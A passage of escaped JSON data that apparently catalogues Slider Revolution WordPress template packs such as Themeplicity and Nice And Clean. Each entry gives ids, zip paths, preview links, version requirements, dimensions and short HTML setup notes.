class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Themeplicity Website Template\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"5\",\"installed\":false},\"105\":{\"id\":\"116\",\"title\":\"Themeplicity What We Do\",\"alias\":\"themeplicity_whatwedo\",\"zip\":\"packs\\/themeplicity_whatwedo.zip\",\"uid\":\"aa800a44b5a3eab30414dde1f32bfed7\",\"img\":\"themeplicity_whatwedo\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"5.3.0\",\"width\":\"1240\",\"height\":\"813\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Themeplicity Website Template\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"5\",\"installed\":false},\"106\":{\"id\":\"117\",\"title\":\"Themeplicity Projects\",\"alias\":\"themeplicity_projects\",\"zip\":\"packs\\/themeplicity_projects.zip\",\"uid\":\"5f61b3a13033ba6a51a18270163e0a50\",\"img\":\"themeplicity_projects\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"5.3.0\",\"width\":\"1240\",\"height\":\"813\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Themeplicity Website Template\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"5\",\"installed\":false},\"107\":{\"id\":\"118\",\"title\":\"Themeplicity Whats Great\",\"alias\":\"themeplicity_whatsgreat\",\"zip\":\"packs\\/themeplicity_whatsgreat.zip\",\"uid\":\"ce9faf8c55ed2e33e091b23667e7173b\",\"img\":\"themeplicity_whatsgreat\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"5.3.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Themeplicity Website Template\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"5\",\"installed\":false},\"108\":{\"id\":\"119\",\"title\":\"Themeplicity Tables\",\"alias\":\"themeplicity_tables\",\"zip\":\"packs\\/themeplicity_tables.zip\",\"uid\":\"f28bb4cd20ec1f29a1de7da5ad09c293\",\"img\":\"themeplicity_tables\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"5.3.0\",\"width\":\"1240\",\"height\":\"1059\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Themeplicity Website Template\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"5\",\"installed\":false},\"109\":{\"id\":\"120\",\"title\":\"Themeplicity Contactform\",\"alias\":\"themeplicity_contactform\",\"zip\":\"packs\\/themeplicity_contactform.zip\",\"uid\":\"3e59da970f534490774fa8e053f5b5ed\",\"img\":\"themeplicity_contactform\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"5.3.0\",\"width\":\"1240\",\"height\":\"1067\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Themeplicity Website Template\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"5\",\"installed\":false},\"110\":{\"id\":\"121\",\"title\":\"Themeplicity Footer\",\"alias\":\"themeplicity_footer\",\"zip\":\"packs\\/themeplicity_footer.zip\",\"uid\":\"89eeb0b4b852c5f743e1bd76e3e8f2ef\",\"img\":\"themeplicity_footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"5.3.0\",\"width\":\"1240\",\"height\":\"780\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Themeplicity Website Template\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"5\",\"installed\":false},\"111\":{\"id\":\"122\",\"title\":\"Themeplicity Package\",\"alias\":\"themeplicity-package\",\"zip\":\"\",\"uid\":\"themeplicity-package\",\"img\":\"packages\\/templatepack_themeplicity.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"5.3.0\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Themeplicity Website Template uses the new groups & rows feature introduced in 5.3 to its full potential.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Themeplicity Website Template\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"5\",\"installed\":false},\"112\":{\"id\":\"123\",\"title\":\"Nice And Clean Menu\",\"alias\":\"NiceAndClean_Menu\",\"zip\":\"packs\\/NiceAndClean_Menu.zip\",\"uid\":\"3f8c01e26c7446428e045c4b1180776d\",\"img\":\"NiceAndClean_Menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/nice-clean-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=nice-clean-responsive-wordpress-theme\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"90\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Nice & Clean Template\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"6\",\"installed\":false},\"113\":{\"id\":\"124\",\"title\":\"Nice And Clean Header\",\"alias\":\"NiceAndClean_Header\",\"zip\":\"packs\\/NiceAndClean_Header.zip\",\"uid\":\"76931033addb20a62557c2845a4d6a11\",\"img\":\"NiceAndClean_Header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/nice-clean-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=nice-clean-responsive-wordpress-theme\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Nice & Clean Template\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"6\",\"installed\":false},\"114\":{\"id\":\"125\",\"title\":\"Nice And Clean Services\",\"alias\":\"NiceAndClean_Services\",\"zip\":\"packs\\/NiceAndClean_Services.zip\",\"uid\":\"02f72ec606800c8215bcadea09624e87\",\"img\":\"NiceAndClean_Services\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/nice-clean-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=nice-clean-responsive-wordpress-theme\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"360\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Nice & Clean Template\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"6\",\"installed\":false},\"115\":{\"id\":\"126\",\"title\":\"Nice And Clean About\",\"alias\":\"NiceAndClean_About\",\"zip\":\"packs\\/NiceAndClean_About.zip\",\"uid\":\"9510f6fdbb8e9473e8c22f692a6bc89f\",\"img\":\"NiceAndClean_About\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/nice-clean-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=nice-clean-responsive-wordpress-theme\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Nice & Clean Template\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"6\",\"installed\":false},\"116\":{\"id\":\"127\",\"title\":\"Nice And Clean Video\",\"alias\":\"niceandclean_video\",\"zip\":\"packs\\/niceandclean_video.zip\",\"uid\":\"2bb9e1ad329435cc500542d0c7025e15\",\"img\":\"niceandclean_video\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/nice-clean-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=nice-clean-responsive-wordpress-theme\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Nice & Clean Template\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"6\",\"installed\":false},\"117\":{\"id\":\"128\",\"title\":\"Nice And Clean Highlights\",\"alias\":\"niceandclean_highlights\",\"zip\":\"packs\\/niceandclean_highlights.zip\",\"uid\":\"ff396af163a79d2d5b35db17c1ea7aa6\",\"img\":\"niceandclean_highlights\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/nice-clean-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=nice-clean-responsive-wordpress-theme\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Nice & Clean Template\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"6\",\"installed\":false},\"118\":{\"id\":\"129\",\"title\":\"Nice And Clean Projects\",\"alias\":\"NiceAndClean_Projects\",\"zip\":\"packs\\/NiceAndClean_Projects.zip\",\"uid\":\"1e6695959ef83f8975b52289c08a4d44\",\"img\":\"NiceAndClean_Projects\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/nice-clean-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=nice-clean-responsive-wordpress-theme\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"600\",\"height\":\"600\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Nice & Clean Template\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"6\",\"installed\":false},\"119\":{\"id\":\"130\",\"title\":\"Nice And Clean TextBlocks\",\"alias\":\"niceandclean_textblocks\",\"zip\":\"packs\\/niceandclean_textblocks.zip\",\"uid\":\"1f33eb839c96ea3225faff1c8d382b05\",\"img\":\"niceandclean_textblocks\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/nice-clean-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=nice-clean-responsive-wordpress-theme\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Nice & Clean Template\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"6\",\"installed\":false},\"120\":{\"id\":\"131\",\"title\":\"Nice And Clean CallOut\",\"alias\":\"niceandclean_callout\",\"zip\":\"packs\\/niceandclean_callout.zip\",\"uid\":\"54d4d9bcf79d357de0e614700e909863\",\"img\":\"niceandclean_callout\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/nice-clean-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=nice-clean-responsive-wordpress-theme\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"500\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Nice & Clean Template\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"6\",\"installed\":false},\"121\":{\"id\":\"132\",\"title\":\"Nice And Clean Footer\",\"alias\":\"niceandclean_footer\",\"zip\":\"packs\\/niceandclean_footer.zip\",\"uid\":\"5492d7f72b3771a4e754f91bda063b15\",\"img\":\"niceandclean_footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/nice-clean-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=nice-clean-responsive-wordpress-theme\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"400\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">For using the social sharing buttons, please install the social sharing add-on.<br><br><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Nice & Clean Template\",\"package_order\":\"9\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"6\",\"installed\":false},\"122\":{\"id\":\"134\",\"title\":\"80s Style Intro\",\"alias\":\"80s\",\"zip\":\"80s.zip\",\"uid\":\"98881ab51f71b2fbdb220752d321b15a\",\"img\":\"80s\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/80s-style-intro\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=80s-style-intro\",\"version\":\"1.0.0\",\"required\":\"5.3.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">This intro hero block takes you back to the 80\'s with some funky effects.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content hero slider. Just edit the slide to change the background image and text.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"123\":{\"id\":\"135\",\"title\":\"Blur Effect 